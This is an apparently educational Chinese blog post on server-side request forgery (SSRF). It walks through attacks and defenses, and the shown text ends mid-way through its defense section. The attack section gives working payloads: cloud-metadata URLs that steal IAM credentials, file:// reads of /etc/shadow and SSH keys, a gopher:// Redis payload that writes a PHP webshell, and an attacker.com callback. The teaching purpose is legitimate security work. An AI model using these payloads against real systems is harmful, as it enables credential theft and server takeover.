<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="SSRF 服务端请求伪造：原理、攻击与防御, 是小竹不是小猪">
    <meta name="description" content="一、核心原理SSRF（Server-Side Request Forgery，服务端请求伪造）的本质是攻击者让服务端代替自己向任意地址发起网络请求。
与 CSRF 形成对称：CSRF 是借用户的浏览器向目标站发请求（攻击发生在客户端），SS">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>SSRF 服务端请求伪造：原理、攻击与防御 | 是小竹不是小猪</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 5.4.0"></head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">是小竹不是小猪</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">是小竹不是小猪</div>
        <div class="logo-desc">
            
            每一年都奔走在自己的热爱里
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/zhuyanzhen-lab/zhuyanzhen-lab.github.io" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/zhuyanzhen-lab/zhuyanzhen-lab.github.io" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/29.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">SSRF 服务端请求伪造：原理、攻击与防御</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/%E5%AE%89%E5%85%A8/">
                                <span class="chip bg-color">安全</span>
                            </a>
                        
                            <a href="/tags/Web%E5%AE%89%E5%85%A8/">
                                <span class="chip bg-color">Web安全</span>
                            </a>
                        
                            <a href="/tags/SSRF/">
                                <span class="chip bg-color">SSRF</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2026-08-08
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h3 id="一、核心原理"><a href="#一、核心原理" class="headerlink" title="一、核心原理"></a>一、核心原理</h3><p>SSRF（Server-Side Request Forgery，服务端请求伪造）的本质是<strong>攻击者让服务端代替自己向任意地址发起网络请求</strong>。</p>
<p>与 CSRF 形成对称：CSRF 是借用户的浏览器向目标站发请求（攻击发生在客户端），SSRF 是借服务端的网络能力向内网或本地服务发请求（攻击发生在服务端）。</p>
<pre><code>CSRF：攻击者 → 用户浏览器 → 目标站
SSRF：攻击者 → 目标服务端 → 内网服务 / 云服务元数据 / 本地文件
</code></pre>
<p>理解 SSRF 需要抓住一个前提：很多 Web 应用有”代替用户去请求其他地址”的功能——图片加载（用户输入一个图片 URL，服务端下载后展示）、文件导入（用户提供一个远程文件地址，服务端拉取解析）、链接预览（用户贴一个链接，服务端抓取标题和摘要）、Webhook 回调（用户注册一个回调 URL，服务端在事件触发时通知）。</p>
<p>这些功能的共同点是：服务端接受一个 URL 参数，然后主动发起 HTTP 请求。如果服务端没有校验这个 URL 的目标地址，攻击者就可以让它请求内网 IP、本地端口、云元数据接口——这些地址从外部网络是不可达的，但服务端在内网中，天然可以访问。</p>
<p>一个完整的 SSRF 攻击需要满足两个条件：第一，应用有从用户输入中接受 URL 并发起请求的功能。第二，服务端没有对 URL 的目标地址做有效校验（如白名单、协议限制、内网 IP 过滤）。</p>
<hr>
<h3 id="二、四种-SSRF-完整攻击实例"><a href="#二、四种-SSRF-完整攻击实例" class="headerlink" title="二、四种 SSRF 完整攻击实例"></a>二、四种 SSRF 完整攻击实例</h3><h4 id="2-1-基础-SSRF：探测和访问内网服务"><a href="#2-1-基础-SSRF：探测和访问内网服务" class="headerlink" title="2.1 基础 SSRF：探测和访问内网服务"></a>2.1 基础 SSRF：探测和访问内网服务</h4><p><strong>场景：</strong> 一个在线头像功能，用户输入图片 URL，服务端下载图片后裁剪为头像。</p>
<pre><code>https://app.com/api/avatar?url=https://example.com/photo.jpg
</code></pre>
<p><strong>第一步：确认攻击面。</strong> 攻击者注册账号，进入头像设置页面。输入一个外部图片 URL，服务端正常下载并返回裁剪后的图片。抓包确认服务端确实发起了 HTTP 请求去下载图片。</p>
<p><strong>第二步：探测内网。</strong> 攻击者将 URL 改为内网地址：</p>
<pre><code>https://app.com/api/avatar?url=http://192.168.1.1
</code></pre>
<p>服务端向内网 <code>192.168.1.1</code> 发起 HTTP 请求。如果返回了内容（哪怕是一个错误页面），说明 SSRF 存在。攻击者通过响应时间、状态码、响应内容判断内网中有哪些主机和端口是开放的。</p>
<p><strong>第三步：访问内网服务。</strong> 攻击者扫描到内网 <code>192.168.1.100:6379</code> 运行着 Redis（默认不设置密码），直接通过 SSRF 发送 Redis 命令：</p>
<pre><code>https://app.com/api/avatar?url=http://192.168.1.100:6379/
</code></pre>
<p>如果服务端使用的是简单的 HTTP 客户端（如 Python 的 <code>requests.get(url)</code>），请求会被发送到 Redis。Redis 是文本协议，会尝试解析 HTTP 请求的内容，虽然大部分会报错，但攻击者可以利用 <code>gopher://</code> 协议构造精确的 Redis 命令（见 2.3）。</p>
<p><strong>完整数据流：</strong></p>
<pre><code>攻击者提交 url=http://192.168.1.100:6379
  → 服务端接受 URL，发起 HTTP 请求到 192.168.1.100:6379
  → 请求到达内网 Redis 服务
  → Redis 收到非标准请求，返回错误信息
  → 服务端将错误信息（或响应内容）返回给攻击者
  → 攻击者确认内网 Redis 存在
</code></pre>
<p><strong>为什么这能成功？</strong> 因为服务端在内网中，天然可以访问内网地址。攻击者从外部网络无法直接访问 <code>192.168.1.100</code>，但服务端可以。SSRF 就是借服务端的网络位置做跳板。</p>
<h4 id="2-2-云元数据攻击：窃取云凭证"><a href="#2-2-云元数据攻击：窃取云凭证" class="headerlink" title="2.2 云元数据攻击：窃取云凭证"></a>2.2 云元数据攻击：窃取云凭证</h4><p><strong>场景：</strong> 应用部署在 AWS/阿里云/腾讯云等云平台上，同样有图片加载功能。</p>
<p><strong>第一步：确认云环境。</strong> 攻击者尝试访问云平台的元数据服务地址：</p>
<pre><code>https://app.com/api/avatar?url=http://169.254.169.254/latest/meta-data/
</code></pre>
<p><code>169.254.169.254</code> 是 AWS/阿里云等云平台提供的链路本地地址（link-local），只有从云实例内部才能访问。它提供当前实例的元数据，包括 IAM 角色凭证。</p>
<p><strong>第二步：获取 IAM 凭证。</strong> 如果 SSRF 存在，服务端向元数据服务发起请求，返回实例的元数据。攻击者逐步深入：</p>
<pre><code># 获取 IAM 角色名
https://app.com/api/avatar?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
→ 返回: app-server-role

# 获取该角色的临时凭证
https://app.com/api/avatar?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/app-server-role
→ 返回:
&#123;
  &quot;AccessKeyId&quot;: &quot;ASIA...&quot;,
  &quot;SecretAccessKey&quot;: &quot;wJalr...&quot;,
  &quot;Token&quot;: &quot;FwoGZXIvY...&quot;,
  &quot;Expiration&quot;: &quot;2026-08-08T12:00:00Z&quot;
&#125;
</code></pre>
<p><strong>第三步：利用凭证。</strong> 攻击者拿到 AK/SK/Token 后，用 AWS CLI 或 SDK 以该角色的权限操作云资源——读取 S3 桶中的文件、操作 RDS 数据库、启动新的 EC2 实例。</p>
<p><strong>完整数据流：</strong></p>
<pre><code>攻击者提交 url=http://169.254.169.254/latest/meta-data/iam/security-credentials/app-role
  → 服务端发起 HTTP 请求到 169.254.169.254
  → 云平台元数据服务返回 IAM 临时凭证（AK/SK/Token）
  → 服务端将凭证内容返回给攻击者
  → 攻击者用凭证调用 AWS API，接管云资源
</code></pre>
<p><strong>为什么这特别危险？</strong> 因为云凭证的权限通常很大（读写 S3、操作数据库、管理其他实例），而且临时凭证的有效期通常是几小时到几天。一次 SSRF 可能导致整个云环境被接管。</p>
<p><strong>AWS 的防御措施——IMDSv2：</strong> 2019 年后 AWS 推出了 IMDSv2，将获取元数据的流程改为两步走。第一步必须先发一个 PUT 请求获取 session token：</p>
<pre><code>PUT http://169.254.169.254/latest/api/token
Header: X-aws-ec2-metadata-token-ttl-seconds: 21600
→ 响应返回一个 token 字符串
</code></pre>
<p>第二步，带着这个 token 才能 GET 元数据：</p>
<pre><code>GET http://169.254.169.254/latest/meta-data/
Header: X-aws-ec2-metadata-token: &lt;上一步拿到的token&gt;
</code></pre>
<p>这个设计的核心思路不是”加密”或”认证”，而是<strong>提高请求构造的门槛</strong>，让大部分 SSRF 场景发不出符合要求的那种请求。</p>
<p><strong>为什么 PUT 要求能挡住大部分 SSRF？</strong> 因为 GET 和 PUT 的差异不只是方法名不同，关键在于浏览器和 HTML 标签对请求方法的支持范围不同。HTML 标签（<code>&lt;img&gt;</code>、<code>&lt;link&gt;</code>、<code>&lt;script&gt;</code>、<code>&lt;iframe&gt;</code>）只能发起 GET 请求，没有任何办法让它们发 PUT。表单（<code>&lt;form&gt;</code>）只能发 GET 和 POST，也发不了 PUT。所以如果 SSRF 的注入点是这些 HTML 标签，攻击者根本发不出第一步的 PUT 请求，拿不到 token，元数据就访问不了。IMDSv2 挡的是”只能发 GET 的低能力 SSRF”。</p>
<p><strong>为什么 IMDSv2 不是万能的？</strong> 如果 SSRF 的注入点不是 HTML 标签，而是服务端代码能构造任意 HTTP 请求（比如用 <code>curl</code>、<code>requests</code>、<code>urllib</code> 发起请求），那 PUT 方法、自定义请求头都不在话下。攻击者可以完整地执行两步：先 PUT 拿 token，再 GET 拿元数据。另外 <code>gopher://</code> 协议更危险——它能构造任意 TCP 数据流，等于把原始字节直接发给 169.254.169.254 的 80 端口。攻击者可以在 gopher payload 里手写完整的 PUT 请求行和请求头，效果和 curl 一样，IMDSv2 的两步校验完全被绕过。所以防御 SSRF 不能只靠 IMDSv2，还需要从服务端限制出网目标（内网 IP 过滤、DNS 校验等）。</p>
<h4 id="2-3-协议利用：gopher-dict-file-协议攻击内网"><a href="#2-3-协议利用：gopher-dict-file-协议攻击内网" class="headerlink" title="2.3 协议利用：gopher/dict/file 协议攻击内网"></a>2.3 协议利用：gopher/dict/file 协议攻击内网</h4><p><strong>场景：</strong> 服务端的 URL 解析不仅支持 <code>http://</code>，还支持其他协议（<code>file://</code>、<code>dict://</code>、<code>gopher://</code>、<code>ldap://</code>）。</p>
<p><strong>第一步：读取本地文件。</strong> 如果服务端支持 <code>file://</code> 协议：</p>
<pre><code>https://app.com/api/avatar?url=file:///etc/passwd
</code></pre>
<p>服务端读取本地文件 <code>/etc/passwd</code> 的内容，作为”图片数据”返回给攻击者。攻击者可以读取配置文件、密钥文件、源代码：</p>
<pre><code>file:///etc/passwd
file:///etc/shadow（需要权限）
file:///root/.ssh/id_rsa
file:///var/www/html/config.php
file:///proc/self/environ（环境变量，可能包含数据库密码）
</code></pre>
<p><strong>第二步：用 gopher 协议精确构造请求。</strong> <code>gopher://</code> 是最危险的协议，因为它可以向任意端口发送任意 TCP 数据。攻击者可以用它精确构造对内网服务的请求：</p>
<pre><code># gopher:// 格式：gopher://host:port/原始TCP数据

# 攻击内网 Redis，写入 WebShell
gopher://192.168.1.100:6379/%0D%0A
  CONFIG SET dir /var/www/html%0D%0A
  CONFIG SET dbfilename shell.php%0D%0A
  SET x &quot;&lt;?php system($_GET[&#39;cmd&#39;]); ?&gt;&quot;%0D%0A
  SAVE%0D%0A
</code></pre>
<p>URL 编码后的 <code>%0D%0A</code> 是 <code>\r\n</code>（CRLF），gopher 协议会将这些原始数据直接发送到 Redis 的 6379 端口。Redis 逐行解析命令，执行写入 WebShell 的操作。</p>
<p><strong>第三步：攻击内网 MySQL。</strong> 类似地，用 gopher 协议构造 MySQL 认证和数据查询请求：</p>
<pre><code>gopher://192.168.1.200:3306/%00...（MySQL 协议格式的认证和数据请求）
</code></pre>
<p><strong>完整数据流（gopher + Redis）：</strong></p>
<pre><code>攻击者提交 url=gopher://192.168.1.100:6379/%0D%0A...
  → 服务端 URL 解析器识别 gopher:// 协议
  → 服务端向 192.168.1.100:6379 建立 TCP 连接
  → 将 URL 中编码的原始数据解码后发送到 Redis
  → Redis 执行 CONFIG SET + SET + SAVE 命令
  → WebShell 被写入 /var/www/html/shell.php
  → 攻击者访问 WebShell，获得服务器控制权
</code></pre>
<p><strong>为什么 gopher 最危险？</strong> 因为 HTTP 协议只能发 HTTP 请求，但内网中的很多服务（Redis、MySQL、Memcached、FastCGI）不识别 HTTP。gopher 协议允许发送任意 TCP 数据，等于给了攻击者一个通用的内网协议代理。</p>
<p><strong>防御的关键：</strong> 限制服务端 URL 解析器支持的协议。大多数场景只需要 <code>http://</code> 和 <code>https://</code>，应该禁止 <code>file://</code>、<code>gopher://</code>、<code>dict://</code>、<code>ldap://</code> 等协议。</p>
<h4 id="2-4-盲-SSRF：无回显但有影响"><a href="#2-4-盲-SSRF：无回显但有影响" class="headerlink" title="2.4 盲 SSRF：无回显但有影响"></a>2.4 盲 SSRF：无回显但有影响</h4><p><strong>场景：</strong> 服务端发起请求后不将响应内容返回给用户（如后台异步发送 Webhook 通知）。攻击者看不到服务端的响应，无法直接读取内网服务的数据。</p>
<p><strong>第一步：确认盲 SSRF 存在。</strong> 攻击者注册一个 Webhook 回调 URL：</p>
<pre><code>https://app.com/api/webhook?url=http://attacker.com/callback
</code></pre>
<p>服务端向 <code>attacker.com/callback</code> 发起请求。攻击者在自己的服务器上收到了请求，确认 SSRF 存在。</p>
<p><strong>第二步：利用副作用。</strong> 虽然没有回显，但攻击者可以通过观察内网服务的行为变化来推断信息：</p>
<p>端口扫描：将 URL 改为 <code>http://192.168.1.100:6379</code>，如果攻击者的回调很快收到响应（内网服务快速拒绝），说明端口开放；如果超时，说明端口关闭或被防火墙拦截。</p>
<pre><code>url=http://192.168.1.100:6379   → 回调在 0.1s 后收到（端口开放，Redis 快速响应）
url=http://192.168.1.100:9999   → 回调在 30s 后收到（端口关闭，连接超时）
</code></pre>
<p>触发内部操作：如果内网有一个管理接口 <code>http://192.168.1.50/admin/reset-all</code>，攻击者通过 SSRF 触发它，虽然看不到响应，但如果页面上所有用户的数据被重置了，就知道请求成功了。</p>
<p><strong>DNS 外带：</strong> 如果 SSRF 支持 DNS 查询，攻击者可以让服务端解析一个攻击者控制的域名，通过 DNS 记录传递数据：</p>
<pre><code>url=http://data.attacker.com/   ← 服务端向攻击者的 DNS 发起查询
</code></pre>
<p>攻击者在 DNS 日志中看到来自目标服务端 IP 的查询请求，确认 SSRF 存在，并获取了服务端的真实内网 IP。</p>
<p><strong>完整数据流（盲 SSRF + 内部操作）：</strong></p>
<pre><code>攻击者提交 url=http://192.168.1.50/admin/reset-all
  → 服务端向 192.168.1.50 发起 HTTP GET 请求
  → 内网管理接口执行重置操作
  → 攻击者看不到响应内容
  → 但攻击者观察到应用数据被重置 → 确认请求成功执行
</code></pre>
<p><strong>盲 SSRF 的难点：</strong> 攻击者无法直接读取内网数据，只能利用副作用（数据被修改、服务行为变化）来推断。但它的威胁仍然很大——如果内网有不需要认证就能触发操作的管理接口，盲 SSRF 就足够了。</p>
<hr>
<h3 id="三、防御策略详解"><a href="#三、防御策略详解" class="headerlink" title="三、防御策略详解"></a>三、防御策略详解</h3><h4 id="3-1-URL-白名单：只允许请求预定义的安全域名"><a href="#3-1-URL-白名单：只允许请求预定义的安全域名" class="headerlink" title="3.1 URL 白名单：只允许请求预定义的安全域名"></a>3.1 URL 白名单：只允许请求预定义的安全域名</h4><p>最直接的防御：服务端只允许请求白名单中的域名，其他一律拒绝。</p>
<pre><code class="python">ALLOWED_DOMAINS = &#123;&#39;images.example.com&#39;, &#39;cdn.example.com&#39;&#125;

def fetch_url(url):
    parsed = urlparse(url)
    if parsed.hostname not in ALLOWED_DOMAINS:
        raise ValueError(f&quot;Domain &#123;parsed.hostname&#125; not allowed&quot;)
    return requests.get(url)
</code></pre>
<p><strong>为什么白名单最安全？</strong> 因为默认拒绝一切，只放行已知安全的地址。攻击者无论构造什么 URL，只要不在白名单中就会被拒绝。</p>
<p><strong>白名单的常见绕过和注意事项：</strong></p>
<p>域名解析绕过：攻击者注册 <code>evil.com</code>，将 <code>images.example.com.evil.com</code> 指向自己的服务器。如果白名单校验用 <code>endswith(&#39;example.com&#39;)</code>，这个域名会通过检查。正确做法是精确匹配或校验注册域。</p>
<pre><code class="python"># 错误：endswith 可被绕过
if parsed.hostname.endswith(&#39;example.com&#39;):  # images.example.com.evil.com 也通过
    ...

# 正确：精确匹配
if parsed.hostname in ALLOWED_DOMAINS:
    ...

# 或者校验注册域
import tldextract
extracted = tldextract.extract(parsed.hostname)
if extracted.registered_domain != &#39;example.com&#39;:
    raise ValueError(&quot;Domain not allowed&quot;)
</code></pre>
<p>DNS 重绑定攻击：这是 SSRF 防御中最精巧的绕过手段之一。攻击者注册一个域名 <code>evil.com</code>，自己控制 DNS 服务器，把 TTL（Time To Live，DNS 记录的缓存时间）设成 1 秒，然后配置 DNS 服务器对同一个域名交替返回不同的 IP。</p>
<p><strong>攻击的完整过程：</strong></p>
<pre><code>T=0s    防御层解析 evil.com → 问攻击者的 DNS 服务器 → 返回 1.2.3.4，缓存 1 秒
T=0.1s  防御层检查 1.2.3.4 → 公网 IP → 合法 → 放行
T=1s    缓存过期，1.2.3.4 这条记录被丢弃
T=1.1s  请求层解析 evil.com → 缓存没了，重新问攻击者的 DNS 服务器 → 这次返回 169.254.169.254
        请求实际发到了 169.254.169.254 → 攻击者拿到云元数据
</code></pre>
<p><strong>为什么两次解析 evil.com 会得到不同的 IP？</strong> DNS 解析不是”一次解析，永远记住”。每次解析出来的结果会被缓存，但缓存有过期时间（TTL）。攻击者把 TTL 设成 1 秒，意味着 1 秒后缓存失效，下次查询必须重新问 DNS 服务器。攻击者控制着自己的 DNS 服务器，每次查询返回什么 IP 完全由他决定——第一次返回 1.2.3.4，第二次返回 169.254.169.254。DNS 协议允许这样做，这不算异常行为。攻击者不需要在 1 秒内”修改 DNS 记录”，他的 DNS 服务器从一开始就被配置成交替返回两个 IP，这是服务器的程序逻辑，不是动态修改。</p>
<p><strong>为什么第二次解析出内网 IP 没有人拒绝？</strong> 因为第二次解析根本不在防御层的管辖范围内。防御层的代码只执行了一次：解析、检查、放行。放行之后，控制权交给了 HTTP 请求库（比如 <code>requests.get(url)</code>）。请求库拿到的是原始 URL <code>http://evil.com/api/data</code>，它不知道防御层已经做过检查了，它只知道自己需要访问 <code>evil.com</code>，于是自己去做了一次 DNS 解析。这次解析是请求库内部的行为，防御层完全不参与，也看不到结果。换句话说，防御层检查的是”第一次解析的结果”，但实际建立连接用的是”第二次解析的结果”。这两次解析之间隔了 TTL 过期的时间差，结果不同，而防御层对第二次解析毫无感知。</p>
<p>防御 DNS 重绑定的正确做法是<strong>只做一次 DNS 解析，然后用解析出来的 IP 直接建立连接</strong>，不给”第二次解析”留机会：</p>
<pre><code class="python">import socket

def safe_fetch(url):
    parsed = urlparse(url)
    # 解析域名得到 IP
    ip = socket.gethostbyname(parsed.hostname)
    # 校验 IP 不是内网地址
    if is_internal_ip(ip):
        raise ValueError(&quot;Internal IP not allowed&quot;)
    # 用已校验的 IP 直接发起请求，不再让请求库重新解析域名
    new_url = url.replace(parsed.hostname, ip)
    return requests.get(new_url)
</code></pre>
<p>这样 DNS 解析只发生一次（防御层的那次），实际请求直接连到已校验的 IP，没有”第二次解析”的机会，DNS 重绑定就失效了。</p>
<h4 id="3-2-内网-IP-过滤：禁止请求私有地址"><a href="#3-2-内网-IP-过滤：禁止请求私有地址" class="headerlink" title="3.2 内网 IP 过滤：禁止请求私有地址"></a>3.2 内网 IP 过滤：禁止请求私有地址</h4><p>如果业务需要允许用户输入任意 URL（不能做域名白名单），至少要过滤内网 IP 地址：</p>
<pre><code class="python">import ipaddress

INTERNAL_NETWORKS = [
    ipaddress.ip_network(&#39;10.0.0.0/8&#39;),
    ipaddress.ip_network(&#39;172.16.0.0/12&#39;),
    ipaddress.ip_network(&#39;192.168.0.0/16&#39;),
    ipaddress.ip_network(&#39;127.0.0.0/8&#39;),
    ipaddress.ip_network(&#39;169.254.0.0/16&#39;),  # 云元数据地址
    ipaddress.ip_network(&#39;0.0.0.0/8&#39;),
    ipaddress.ip_network(&#39;::1/128&#39;),           # IPv6 回环
    ipaddress.ip_network(&#39;fc00::/7&#39;),          # IPv6 私有地址
]

def is_internal_ip(ip_str):
    try:
        ip = ipaddress.ip_address(ip_str)
        return any(ip in network for network in INTERNAL_NETWORKS)
    except ValueError:
        return True  # 无法解析的 IP 一律拒绝
</code></pre>
<p><strong>校验时机很关键：</strong> 必须在 DNS 解析之后、发起请求之前校验 IP。如果只校验 URL 中的域名（<code>if &#39;192.168&#39; in url</code>），攻击者用域名指向内网 IP 就能绕过。</p>
<pre><code class="python">def safe_fetch(url):
    parsed = urlparse(url)
    # 先解析域名
    ip = socket.gethostbyname(parsed.hostname)
    # 校验解析后的 IP
    if is_internal_ip(ip):
        raise ValueError(&quot;Internal IP not allowed&quot;)
    # 用校验过的 IP 发起请求
    ...
</code></pre>
<p><strong>必须过滤的地址范围：</strong></p>
<p><code>10.0.0.0/8</code>、<code>172.16.0.0/12</code>、<code>192.168.0.0/16</code>——RFC 1918 私有地址。</p>
<p><code>127.0.0.0/8</code>——回环地址。<code>127.0.0.1</code> 是 localhost，但 <code>127.0.0.2</code>、<code>127.x.x.x</code> 也指向本机。</p>
<p><code>169.254.0.0/16</code>——链路本地地址。云元数据服务 <code>169.254.169.254</code> 在这个范围。</p>
<p><code>0.0.0.0</code>——在某些系统上解析为 localhost。</p>
